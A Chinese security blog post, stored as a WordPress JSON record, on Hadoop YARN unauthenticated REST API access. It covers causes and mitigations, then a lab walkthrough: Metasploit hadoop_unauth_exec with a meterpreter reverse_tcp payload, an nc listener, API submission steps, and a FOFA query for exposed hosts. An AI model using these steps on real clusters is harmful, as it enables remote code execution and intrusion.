{"id":1436,"date":"2025-01-19T21:48:03","date_gmt":"2025-01-19T13:48:03","guid":{"rendered":"http:\/\/gzxingyu.cloud\/?p=1436"},"modified":"2025-01-19T21:48:04","modified_gmt":"2025-01-19T13:48:04","slug":"04-hadoop%e6%9c%aa%e6%8e%88%e6%9d%83%e8%ae%bf%e9%97%ae","status":"publish","type":"post","link":"http:\/\/gzxingyu.cloud\/index.php\/2025\/01\/19\/04-hadoop%e6%9c%aa%e6%8e%88%e6%9d%83%e8%ae%bf%e9%97%ae\/","title":{"rendered":"04.Hadoop\u672a\u6388\u6743\u8bbf\u95ee"},"content":{"rendered":"

\u4e00\u3001Hadoop\u7b80\u4ecb<\/h3>\n

Hadoop\u662f\u4e00\u4e2a\u529f\u80fd\u5f3a\u5927\u7684\u5f00\u6e90\u5206\u5e03\u5f0f\u8ba1\u7b97\u5e73\u53f0\uff0c\u4e13\u4e3a\u5904\u7406\u548c\u5b58\u50a8\u5927\u89c4\u6a21\u6570\u636e\u96c6\u800c\u8bbe\u8ba1\u3002<\/p>\n

\u4e8c\u3001\u6f0f\u6d1e\u6210\u56e0<\/h3>\n

Hadoop YARN\uff08Yet Another Resource Negotiator\uff09\u662fHadoop\u751f\u6001\u7cfb\u7edf\u4e2d\u7684\u96c6\u7fa4\u8d44\u6e90\u7ba1\u7406\u5668\uff0c \u8d1f\u8d23\u534f\u8c03\u96c6\u7fa4\u4e2d\u7684\u8ba1\u7b97\u8d44\u6e90\u548c\u8c03\u5ea6\u4f5c\u4e1a\u3002\u7136\u800c\uff0cYARN\u7684\u67d0\u4e9b\u914d\u7f6e\u53ef\u80fd\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e<\/p>\n

\u6f0f\u6d1e\u6210\u56e0\uff1a<\/p>\n

    \n
  1. \u9ed8\u8ba4\u5f00\u653e\u7684REST API\u7aef\u53e3\uff1aYARN\u7684REST API\u9ed8\u8ba4\u5f00\u653e\u57288088\u548c8090\u7aef\u53e3\uff0c\u5982\u679c\u672a\u8fdb\u884c\u9002\u5f53\u7684\u8bbf\u95ee\u63a7\u5236\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u8fd9\u4e9bAPI\u8fdb\u884c\u672a\u6388\u6743\u8bbf\u95ee\u3002<\/li>\n
  2. \u914d\u7f6e\u4e0d\u5f53\uff1a\u5982\u679cYARN\u7684\u914d\u7f6e\u6587\u4ef6\uff08\u5982yarn-site.xml\uff09\u672a\u6b63\u786e\u8bbe\u7f6e\u8bbf\u95ee\u63a7\u5236\u548c\u8ba4\u8bc1\u673a\u5236\uff0c\u53ef\u80fd\u5bfc\u81f4\u653b\u51fb \u8005\u80fd\u591f\u7ed5\u8fc7\u5b89\u5168\u63aa\u65bd\u3002<\/li>\n
  3. \u6743\u9650\u8fc7\u5927\uff1a\u5982\u679cYARN\u7684\u67d0\u4e9b\u7528\u6237\u6216\u670d\u52a1\u88ab\u6388\u4e88\u8fc7\u9ad8\u7684\u6743\u9650\uff0c\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u8fd9\u4e9b\u6743\u9650\u6267\u884c\u6076\u610f\u64cd\u4f5c\u3002<\/li>\n
  4. \u670d\u52a1\u6f0f\u6d1e\uff1aYARN\u7684\u67d0\u4e9b\u670d\u52a1\u53ef\u80fd\u5b58\u5728\u5df2\u77e5\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u8fd9\u4e9b\u6f0f\u6d1e\u8fdb\u884c\u653b\u51fb\u3002<\/li>\n<\/ol>\n

    \u4e09\u3001\u5b89\u5168\u63aa\u65bd<\/h3>\n
      \n
    1. \u9650\u5236API\u8bbf\u95ee\uff1a\u5e94\u8be5\u9650\u5236\u5bf9YARN REST API\u7684\u8bbf\u95ee\uff0c\u53ea\u5141\u8bb8\u7279\u5b9a\u7684IP\u5730\u5740\u6216\u7f51\u7edc\u8bbf\u95ee\u8fd9\u4e9b\u7aef\u53e3\u3002<\/li>\n
    2. \u914d\u7f6e\u8ba4\u8bc1\u673a\u5236\uff1a\u542f\u7528YARN\u7684\u8ba4\u8bc1\u673a\u5236\uff0c\u5982Kerberos\uff0c\u786e\u4fdd\u6240\u6709\u8bf7\u6c42\u90fd\u7ecf\u8fc7\u8ba4\u8bc1\u3002<\/li>\n
    3. \u6743\u9650\u6700\u5c0f\u5316\uff1a\u9075\u5faa\u6700\u5c0f\u6743\u9650\u539f\u5219\uff0c\u786e\u4fdd\u7528\u6237\u548c\u670d\u52a1\u53ea\u62e5\u6709\u5b8c\u6210\u5176\u4efb\u52a1\u6240\u9700\u7684\u6700\u5c0f\u6743\u9650\u3002<\/li>\n
    4. \u66f4\u65b0\u548c\u6253\u8865\u4e01\uff1a\u5b9a\u671f\u68c0\u67e5\u5e76\u66f4\u65b0YARN\u53ca\u5176\u4f9d\u8d56\u7684\u8f6f\u4ef6\uff0c\u5e94\u7528\u5b89\u5168\u8865\u4e01\u4ee5\u4fee\u590d\u5df2\u77e5\u6f0f\u6d1e\u3002<\/li>\n
    5. \u76d1\u63a7\u548c\u5ba1\u8ba1\uff1a\u5b9e\u65bd\u76d1\u63a7\u548c\u5ba1\u8ba1\u673a\u5236\uff0c\u4ee5\u4fbf\u53ca\u65f6\u53d1\u73b0\u548c\u54cd\u5e94\u53ef\u7591\u6d3b\u52a8\u3002<\/li>\n<\/ol>\n

      \u56db\u3001\u6f0f\u6d1e\u5229\u7528<\/h3>\n

      \u5728kali\u91cc\u5f00\u542fhadoop\u670d\u52a1
      \n\"QQ_1736519136231.png\"<\/p>\n

      1.\u5229\u7528\u811a\u672c<\/h4>\n

      \"Pasted<\/p>\n

      \u5f00\u542f\u76d1\u542c
      \n\"QQ_1736516849566.png\"<\/p>\n

      2.\u5229\u7528\u6a21\u5757<\/h4>\n

      \u6ce8\u610f\uff1a\u6b64\u65b9\u6cd5\u8981\u7528\u5230msf<\/p>\n

      msfconsole -q\nuse exploit\/linux\/http\/hadoop_unauth_exec\nset rhosts 192.168.81.127\nset payload linux\/x64\/meterpreter\/reverse_tcp\nset lhost 192.168.81.238\nset lport 5566\nexploit\n<\/code><\/pre>\n
      3.\u6f0f\u6d1e\u590d\u73b0<\/h4>\n
        \n
      1. \u76d1\u542c\u7aef\u53e3\u7b49\u5f85\u53cd\u5f39 shell \u8fde\u63a5<\/li>\n<\/ol>\n
        nc -lvvp 5566\n<\/code><\/pre>\n
          \n
        1. \u8c03\u7528 New Application API \u521b\u5efa Application POST\u8bf7\u6c42 http:\/\/ip:8088\/ws\/v1\/cluster\/apps\/new-application \uff0c\u521b\u5efaApplication
          \n\u8fd4\u56de\u4fe1\u606f:<\/li>\n<\/ol>\n
          <NewApplication>\n<application-id>application_1688957760252_0004<\/application-id>\n<maximum-resource-capability>\n<memory>8192<\/memory>\n<vCores>4<\/vCores>\n<\/maximum-resource-capability>\n<\/NewApplication>\n<\/code><\/pre>\n
            \n
          1. \u8c03\u7528 Submit Application API \u63d0\u4ea4\u547d\u4ee4 POST\u8bf7\u6c42 http:\/\/ip:8088\/ws\/v1\/cluster\/apps, \u63d0\u4ea4\u6267\u884c\u547d\u4ee4<\/li>\n<\/ol>\n
            \u4e94\u3001\u6f0f\u6d1e\u53d1\u73b0<\/h3>\n
              \n
            • fofa\u8bed\u53e5<\/li>\n<\/ul>\n
              app="APACHE-hadoop-YARN"\n<\/code><\/pre>\n
                \n
              • POST\u8bf7\u6c42
                \n\u5411 http:\/\/ip:port\/ws\/v1\/cluster\/apps\/new-application \u53d1\u9001POST\u8bf7\u6c42\uff0c\u5982\u679c\u54cd\u5e94\u8fd4\u56de application-id\uff0c\u5219\u8868\u660e\u5b58\u5728\u6f0f\u6d1e<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"
                \u4e00\u3001Hadoop\u7b80\u4ecb Hadoop\u662f\u4e00\u4e2a\u529f\u80fd\u5f3a\u5927\u7684\u5f00\u6e90\u5206\u5e03\u5f0f\u8ba1\u7b97\u5e73\u53f0\uff0c\u4e13\u4e3a\u5904\u7406\u548c\u5b58\u50a8\u5927\u89c4\u6a21\u6570\u636e\u96c6\u800c\u8bbe\u8ba1\u3002 \u4e8c\u3001 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[50,9],"tags":[],"class_list":["post-1436","post","type-post","status-publish","format-standard","hentry","category-50","category-9"],"_links":{"self":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1436","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/comments?post=1436"}],"version-history":[{"count":1,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1436\/revisions"}],"predecessor-version":[{"id":1437,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1436\/revisions\/1437"}],"wp:attachment":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/media?parent=1436"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/categories?post=1436"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/tags?post=1436"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}